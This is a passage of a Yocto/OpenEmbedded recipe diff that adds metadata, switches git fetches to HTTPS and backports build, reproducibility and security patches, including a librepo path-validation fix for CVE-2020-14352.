d.setVar('GOBUILDMODE', 'pie')
}
diff --git a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
index a60e851897..8e5f940deb 100644
--- a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
+++ b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
@@ -1,5 +1,6 @@
SUMMARY = "Program for creating simple man pages"
-SECTION = "devel"
+HOMEPAGE = "https://www.gnu.org/software/help2man/"
+DESCRIPTION = "help2man is a tool for automatically generating simple manual pages from program output."SECTION = "devel"
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
DEPENDS = "autoconf-native automake-native"
diff --git a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
index c5761170aa..fc17e8d9b4 100644
--- a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
+++ b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Set of i2c tools for linux"
HOMEPAGE = "https://i2c.wiki.kernel.org/index.php/I2C_Tools"
+DESCRIPTION = "The i2c-tools package contains a heterogeneous set of I2C tools for Linux: a bus probing tool, a chip dumper, register-level SMBus access helpers, EEPROM decoding scripts, EEPROM programming tools, and a python module for SMBus access. All versions of Linux are supported, as long as I2C support is included in the kernel."
SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
index 304ad7fec0..ce4d73caf6 100644
--- a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
+++ b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
@@ -1,6 +1,7 @@
# Copyright (c) 2018 Joshua Watt, Garmin International,Inc.
# Released under the MIT license (see COPYING.MIT for the terms)
SUMMARY = "Generates Icecream toolchain for SDK"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${WORKDIR}/icecc-env.sh;beginline=2;endline=20;md5=dd6b68c1efed8a9fb04e409b3b287d47"
diff --git a/meta/recipes-devtools/intltool/intltool_0.51.0.bb b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
index ecff2faf25..592dbb92e2 100644
--- a/meta/recipes-devtools/intltool/intltool_0.51.0.bb
+++ b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
@@ -1,4 +1,6 @@
SUMMARY = "Utility scripts for internationalizing XML"
+HOMEPAGE = "https://launchpad.net/intltool"
+DESCRIPTION = "Utility scripts for internationalizing XML. This tool automatically extracts translatable strings from oaf, glade, bonobo ui, nautilus theme and other XML files into the po files."
SECTION = "devel"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
diff --git a/meta/recipes-devtools/jquery/jquery_3.5.0.bb b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
index 5c6f9cddbe..efffe05fd2 100644
--- a/meta/recipes-devtools/jquery/jquery_3.5.0.bb
+++ b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "jQuery is a fast, small, and feature-rich JavaScript library"
HOMEPAGE = "https://jquery.com/"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
SECTION = "devel"
LIC_FILES_CHKSUM = "file://${WORKDIR}/${BP}.js;startline=8;endline=10;md5=b1e67ece919e852643f1541a54492d65"
@@ -16,6 +17,11 @@ SRC_URI[map.sha256sum] = "3149351c8cbc3fb230bbf6188617c7ffda77d9e14333f4f5f0aa1a
UPSTREAM_CHECK_REGEX = "jquery-(?P<pver>\d+(\.\d+)+)\.js"
+# https://github.com/jquery/jquery/issues/3927
+# There are ways jquery can expose security issues but any issues are in the apps exposing them
+# and there is little we can directly do
+CVE_CHECK_WHITELIST += "CVE-2007-2379"
+
inherit allarch
do_install() {
diff --git a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
index 98c55dca85..d9e712f74a 100644
--- a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
+++ b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
@@ -1,8 +1,10 @@
SUMMARY = "Libcomps is alternative for yum.comps library (which is for managing rpm package groups)."
+HOMEPAGE = "https://github.com/rpm-software-management/libcomps"
+DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pure C as library and there's bindings for python2 and python3."
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/libcomps.git \
+SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \
file://0001-Add-crc32.c-to-sources-list.patch \
file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
"
diff --git a/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
new file mode 100644
index 0000000000..61d255581b
--- /dev/null
+++ b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
@@ -0,0 +1,58 @@
+From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001
+From: Jaroslav Mracek <jmracek@redhat.com>
+Date: Tue, 3 Sep 2019 11:01:23 +0200
+Subject: [PATCH] Mark job goal.upgrade with sltr as targeted
+
+It allows to keep installed packages in upgrade set.
+
+It also prevents from reinstalling of modified packages with same NEVRA.
+
+
+Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from
+https://github.com/rpm-software-management/libdnf
+
+This bug is present in oe-core's dnf
+
+Remove changes to spec file from upstream
+
+Upstream-Status: Backport
+Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
+---
+ libdnf.spec | 4 ++--
+ libdnf/goal/Goal.cpp | 2 +-
+ libdnf/goal/Goal.hpp | 6 ++++--
+ 3 files changed, 7 insertions(+), 5 deletions(-)
+
+diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp
+index b69be19..a38cbb4 100644
+--- a/libdnf/goal/Goal.cpp
++++ b/libdnf/goal/Goal.cpp
+@@ -767,7 +767,7 @@ void
+ Goal::upgrade(HySelector sltr)
+ {
+ pImpl->actions = static_cast<DnfGoalActions>(pImpl->actions | DNF_UPGRADE);
+- sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE);
++ sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED);
+ }
+
+ void
+diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp
+index f33dfa2..d701317 100644
+--- a/libdnf/goal/Goal.hpp
++++ b/libdnf/goal/Goal.hpp
+@@ -86,8 +86,10 @@ public:
+ /**
+ * @brief If selector ill formed, it rises std::runtime_error()
+ *
+- * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to
+- * reinstall installonly packages.
++ * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed
++ * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo
++ * priority all relevant packages must be present. To upgrade package foo from priority repo, all
++ * installed and available packages of the foo must be in selector plus obsoletes of foo.
+ */
+ void upgrade(HySelector sltr);
+ void userInstalled(DnfPackage *pkg);
+--
+2.7.4
+
diff --git a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
index 43de06e7f9..39858ad401 100644
--- a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
+++ b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
@@ -1,14 +1,17 @@
SUMMARY = "Library providing simplified C and Python API to libsolv"
+HOMEPAGE = "https://github.com/rpm-software-management/libdnf"
+DESCRIPTION = "This library provides a high level package-manager. It's core library of dnf, PackageKit and rpm-ostree. It's replacement for deprecated hawkey library which it contains inside and uses librepo under the hood."
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/libdnf \
+SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \
file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \
file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \
file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \
file://0001-Add-WITH_TESTS-option.patch \
file://0001-include-stdexcept-for-runtime_error.patch \
file://fix-deprecation-warning.patch \
+ file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \
"
SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77"
diff --git a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
index 5409051d79..7d8560f3cc 100644
--- a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
+++ b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
@@ -1,4 +1,6 @@
SUMMARY = "C Library for manipulating module metadata files"
+HOMEPAGE = "https://github.com/fedora-modularity/libmodulemd"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=25a3927bff3ee4f5b21bcb0ed3fcd6bb"
diff --git a/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
new file mode 100644
index 0000000000..8f4c5b73bc
--- /dev/null
+++ b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
@@ -0,0 +1,55 @@
+From 6027d68337b537bf9a68cf810cf9b8e40dac22f8 Mon Sep 17 00:00:00 2001
+From: Jaroslav Rohel <jrohel@redhat.com>
+Date: Wed, 12 Aug 2020 08:35:28 +0200
+Subject: [PATCH] Validate path read from repomd.xml (RhBug:1868639)
+
+= changelog =
+msg: Validate path read from repomd.xml
+type: security
+resolves: https://bugzilla.redhat.com/show_bug.cgi?id=1868639
+
+Upstream-Status: Acepted [https://github.com/rpm-software-management/librepo/commit/7daea2a2429a54dad68b1de9b37a5f65c5cf2600]
+CVE: CVE-2020-14352
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ librepo/yum.c | 17 +++++++++++++++++
+ 1 file changed, 17 insertions(+)
+
+diff --git a/librepo/yum.c b/librepo/yum.c
+index 3059188..529257b 100644
+--- a/librepo/yum.c
++++ b/librepo/yum.c
+@@ -23,6 +23,7 @@
+ #define BITS_IN_BYTE 8
+
+ #include <stdio.h>
++#include <libgen.h>
+ #include <assert.h>
+ #include <stdlib.h>
+ #include <errno.h>
+@@ -770,6 +771,22 @@ prepare_repo_download_targets(LrHandle *handle,
+ continue;
+
+ char *location_href = record->location_href;
++
++ char *dest_dir = realpath(handle->destdir, NULL);
++ path = lr_pathconcat(handle->destdir, record->location_href, NULL);
++ char *requested_dir = realpath(dirname(path), NULL);
++ lr_free(path);
++ if (!g_str_has_prefix(requested_dir, dest_dir)) {
++ g_debug("%s: Invalid path: %s", __func__, location_href);
++ g_set_error(err, LR_YUM_ERROR, LRE_IO, "Invalid path: %s", location_href);
++ g_slist_free_full(*targets, (GDestroyNotify) lr_downloadtarget_free);
++ free(requested_dir);
++ free(dest_dir);
++ return FALSE;
++ }
++ free(requested_dir);
++ free(dest_dir);
++
+ gboolean is_zchunk = FALSE;
+ #ifdef WITH_ZCHUNK
+ if (handle->cachedir && record->header_checksum)
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
index 6a0a59f865..73a58f75e3 100644
--- a/meta/recipes-devtools/librepo/librepo_1.11.2.bb
+++ b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
@@ -1,11 +1,14 @@
SUMMARY = "A library providing C and Python (libcURL like) API \
for downloading linux repository metadata and packages."
+HOMEPAGE = "https://github.com/rpm-software-management/librepo"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/librepo.git \
+SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \
file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \
file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \
+ file://CVE-2020-14352.patch \
"
SRCREV = "67c2d1f83f1bf87be3f26ba730fce7fbdf0c9fba"
diff --git a/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
index 8e17b56d46..c8744e6d5f 100644
--- a/meta/recipes-devtools/libtool/libtool-2.4.6.inc
+++ b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
@@ -21,6 +21,10 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \
file://unwind-opt-parsing.patch \
file://0001-libtool-Fix-support-for-NIOS2-processor.patch \
file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \
+ file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \
+ file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \
+ file://lto-prefix.patch \
+ file://debian-no_hostname.patch \
"
SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e"
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
new file mode 100644
index 0000000000..2e9908725e
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
@@ -0,0 +1,35 @@
+From dfbbbd359e43e0a55fbea06f2647279ad8761cb9 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Wed, 24 Mar 2021 03:04:13 +0000
+Subject: [PATCH] Makefile.am: make sure autoheader run before autoconf
+
+autoheader will update ../libtool-2.4.6/libltdl/config-h.in which
+autoconf needs, so there comes a race sometimes as below:
+ | configure.ac:45: error: required file 'config-h.in' not found
+ | touch '../libtool-2.4.6/libltdl/config-h.in'
+
+So make sure autoheader run before autoconf to avoid this race.
+
+Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ Makefile.am | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile.am b/Makefile.am
+index 4142c90..fe1a9fc 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -365,7 +365,7 @@ lt_configure_deps = $(lt_aclocal_m4) $(lt_aclocal_m4_deps)
+ $(lt_aclocal_m4): $(lt_aclocal_m4_deps)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(ACLOCAL) -I ../m4
+
+-$(lt_configure): $(lt_configure_deps)
++$(lt_configure): $(lt_configure_deps) $(lt_config_h_in)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOCONF)
+
+ $(lt_config_h_in): $(lt_configure_deps)
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
new file mode 100644
index 0000000000..87f8492346
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
@@ -0,0 +1,35 @@
+From e82c06584f02e3e4487aa73aa05981e2a35dc6d1 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Tue, 13 Apr 2021 07:17:29 +0000
+Subject: [PATCH] Makefile.am: make sure autoheader run before automake
+
+When use automake to generate Makefile.in from Makefile.am, there
+comes below race:
+ | configure.ac:45: error: required file 'config-h.in' not found
+
+It is because the file config-h.in in updating process by autoheader,
+so make automake run after autoheader to avoid the above race.
+
+Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ Makefile.am | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/Makefile.am b/Makefile.am
+index 2752ecc..29950db 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -328,7 +328,7 @@ EXTRA_DIST += $(lt_aclocal_m4) \
+ $(lt_obsolete_m4) \
+ $(stamp_mk)
+
+-$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4)
++$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4) $(lt_config_h_in)
+ $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOMAKE) Makefile
+
+ # Don't let unused scripts leak into the libltdl Makefile
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
new file mode 100644
index 0000000000..2bd010b8e4
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
@@ -0,0 +1,22 @@
+If lto is enabled, we need the prefix-map variables to be passed to the linker.
+Add these to the list of options libtool passes through.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: libtool-2.4.6/build-aux/ltmain.in
+===================================================================
+--- libtool-2.4.6.orig/build-aux/ltmain.in
++++ libtool-2.4.6/build-aux/ltmain.in
+@@ -5424,9 +5424,10 @@ func_mode_link ()
+ # --sysroot=* for sysroot support
+ # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization
+ # -stdlib=* select c++ std lib with clang
++ # -f*-prefix-map* needed for lto linking
+ -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \
+ -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \
+- -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*)
++ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*)
+ func_quote_for_eval "$arg"
+ arg=$func_quote_for_eval_result
+ func_append compile_command " $arg"
diff --git a/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
index a5715faaa9..f5fdd00e5e 100644
--- a/meta/recipes-devtools/libtool/libtool_2.4.6.bb
+++ b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
@@ -1,6 +1,6 @@
require libtool-${PV}.inc
-SRC_URI += "file://multilib.patch file://debian-no_hostname.patch"
+SRC_URI += "file://multilib.patch"
RDEPENDS_${PN} += "bash"
diff --git a/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch b/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch
new file mode 100644
index 0000000000..20eea060b1
--- /dev/null
+++ b/meta/recipes-devtools/llvm/llvm/0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch
@@ -0,0 +1,31 @@
+From 86940d87026432683fb6741cd8a34d3b9b18e40d Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Fri, 27 Nov 2020 10:11:08 +0000
+Subject: [PATCH] AsmMatcherEmitter: sort ClassInfo lists by name as well
+
+Otherwise, there are instances which are identical in
+every other field and therefore sort non-reproducibly
+(which breaks binary and source reproducibiliy).
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ llvm/utils/TableGen/AsmMatcherEmitter.cpp | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/llvm/utils/TableGen/AsmMatcherEmitter.cpp b/llvm/utils/TableGen/AsmMatcherEmitter.cpp
+index ccf0959389b..1f801e83b7d 100644
+--- a/llvm/utils/TableGen/AsmMatcherEmitter.cpp
++++ b/llvm/utils/TableGen/AsmMatcherEmitter.cpp
+@@ -359,7 +359,10 @@ public:
+ // name of a class shouldn't be significant. However, some of the backends
+ // accidentally rely on this behaviour, so it will have to stay like this
+ // until they are fixed.
+- return ValueName < RHS.ValueName;
++ if (ValueName != RHS.ValueName)
++ return ValueName < RHS.ValueName;
++ // All else being equal, we should sort by name, for source and binary reproducibility
++ return Name < RHS.Name;
+ }
+ };
+
diff --git a/meta/recipes-devtools/llvm/llvm_git.bb b/meta/recipes-devtools/llvm/llvm_git.bb
index a8607f5008..de92cef1a4 100644
--- a/meta/recipes-devtools/llvm/llvm_git.bb
+++ b/meta/recipes-devtools/llvm/llvm_git.bb
@@ -30,10 +30,11 @@ LLVM_DIR = "llvm${LLVM_RELEASE}"
BRANCH = "release/${MAJOR_VERSION}.x"
SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05"
-SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \
+SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \
file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \
file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \
- "
+ file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \
+ "
UPSTREAM_CHECK_GITTAGREGEX = "llvmorg-(?P<pver>\d+(\.\d+)+)"
@@ -101,6 +102,11 @@ do_configure_prepend() {
sed -ri "s#lib/${LLVM_DIR}#${baselib}/${LLVM_DIR}#g" ${S}/tools/llvm-config/llvm-config.cpp
}
+# patch out build host paths for reproducibility
+do_compile_prepend_class-target() {
+ sed -i -e "s,${WORKDIR},,g" ${B}/tools/llvm-config/BuildVariables.inc
+}
+
do_compile() {
ninja -v ${PARALLEL_MAKE}
}
diff --git a/meta/recipes-devtools/m4/m4-1.4.18.inc b/meta/recipes-devtools/m4/m4-1.4.18.inc
index a9b63c1bf6..6475b02f8b 100644
--- a/meta/recipes-devtools/m4/m4-1.4.18.inc
+++ b/meta/recipes-devtools/m4/m4-1.4.18.inc
@@ -9,6 +9,7 @@ inherit autotools texinfo ptest
SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \
file://ac_config_links.patch \
file://m4-1.4.18-glibc-change-work-around.patch \
+ file://0001-c-stack-stop-using-SIGSTKSZ.patch \
"
SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://run-ptest \
diff --git a/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
new file mode 100644
index 0000000000..883b8a2075
--- /dev/null
+++ b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
@@ -0,0 +1,84 @@
+From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 30 Apr 2021 17:40:36 -0700
+Subject: [PATCH] c-stack: stop using SIGSTKSZ
+
+This patch is required with glibc 2.34+
+based on gnulib [1]
+
+[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ lib/c-stack.c | 22 +++++++++++++---------
+ 1 file changed, 13 insertions(+), 9 deletions(-)
+
+diff --git a/lib/c-stack.c b/lib/c-stack.c
+index 5353c08..863f764 100644
+--- a/lib/c-stack.c
++++ b/lib/c-stack.c
+@@ -51,13 +51,14 @@
+ typedef struct sigaltstack stack_t;
+ #endif
+ #ifndef SIGSTKSZ
+-# define SIGSTKSZ 16384
+-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384
++#define get_sigstksz() (16384)
++#elif HAVE_LIBSIGSEGV
+ /* libsigsegv 2.6 through 2.8 have a bug where some architectures use
+ more than the Linux default of an 8k alternate stack when deciding
+ if a fault was caused by stack overflow. */
+-# undef SIGSTKSZ
+-# define SIGSTKSZ 16384
++#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ))
++#else
++#define get_sigstksz() ((SIGSTKSZ))
+ #endif
+
+ #include <stdlib.h>
+@@ -131,7 +132,8 @@ die (int signo)
+ /* Storage for the alternate signal stack. */
+ static union
+ {
+- char buffer[SIGSTKSZ];
++ /* allocate buffer with size from get_sigstksz() */
++ char *buffer;
+
+ /* These other members are for proper alignment. There's no
+ standard way to guarantee stack alignment, but this seems enough
+@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int))
+ program_error_message = _("program error");
+ stack_overflow_message = _("stack overflow");
+
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ /* Always install the overflow handler. */
+ if (stackoverflow_install_handler (overflow_handler,
+ alternate_signal_stack.buffer,
+- sizeof alternate_signal_stack.buffer))
++ get_sigstksz()))
+ {
+ errno = ENOTSUP;
+ return -1;
+@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int))
+ stack_t st;
+ struct sigaction act;
+ st.ss_flags = 0;
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ # if SIGALTSTACK_SS_REVERSED
+ /* Irix mistakenly treats ss_sp as the upper bound, rather than
+ lower bound, of the alternate stack. */
+- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *);
+- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *);
++ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *);
++ st.ss_size = get_sigstksz() - sizeof (void *);
+ # else
+ st.ss_sp = alternate_signal_stack.buffer;
+- st.ss_size = sizeof alternate_signal_stack.buffer;
++ st.ss_size = get_sigstksz();
+ # endif
+ r = sigaltstack (&st, NULL);
+ if (r != 0)
+--
+2.31.1
+
diff --git a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
index 92d5870f42..5910f4bc70 100644
--- a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
+++ b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Tool for creating device nodes"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
SECTION = "base"
diff --git a/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
new file mode 100644
index 0000000000..f96cc7d302
--- /dev/null
+++ b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
@@ -0,0 +1,431 @@
+From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Mon, 23 Aug 2021 12:45:11 +0200
+Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for
+ C++ 17
+
+Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2]
+
+based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+---
+ src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++---------------------
+ src/mklibs-readelf/elf.hpp | 18 ++++++++--------
+ src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++----------------
+ 3 files changed, 51 insertions(+), 51 deletions(-)
+
+diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp
+index 0e4c0f3..2e6d0f6 100644
+--- a/src/mklibs-readelf/elf.cpp
++++ b/src/mklibs-readelf/elf.cpp
+@@ -36,7 +36,7 @@ file::~file () throw ()
+ delete *it;
+ }
+
+-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error)
++file *file::open (const char *filename) throw ()
+ {
+ struct stat buf;
+ int fd;
+@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro
+ }
+
+ template<typename _class>
+-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file *file::open_class(uint8_t *mem, size_t len) throw ()
+ {
+ switch (mem[EI_DATA])
+ {
+@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run
+ }
+
+ template <typename _class, typename _data>
+-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw ()
+ : file(mem, len)
+ {
+ if (mem[EI_CLASS] != _class::id)
